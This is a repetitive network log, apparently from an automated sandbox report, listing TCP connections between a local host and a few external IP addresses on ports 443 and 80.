          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.18.213.20:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49163
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49163
          Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49163
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49163
          Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49163
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49163
          Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49163
          Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49163
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49163
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49170
          Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49170
          Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49170
          Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49170
          Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49170
          Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49170
          Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49170
          Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 104.21.64.88:443 -> 192.168.2.22:49170
          Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.64.88:443
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.235.137.223:80
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49172
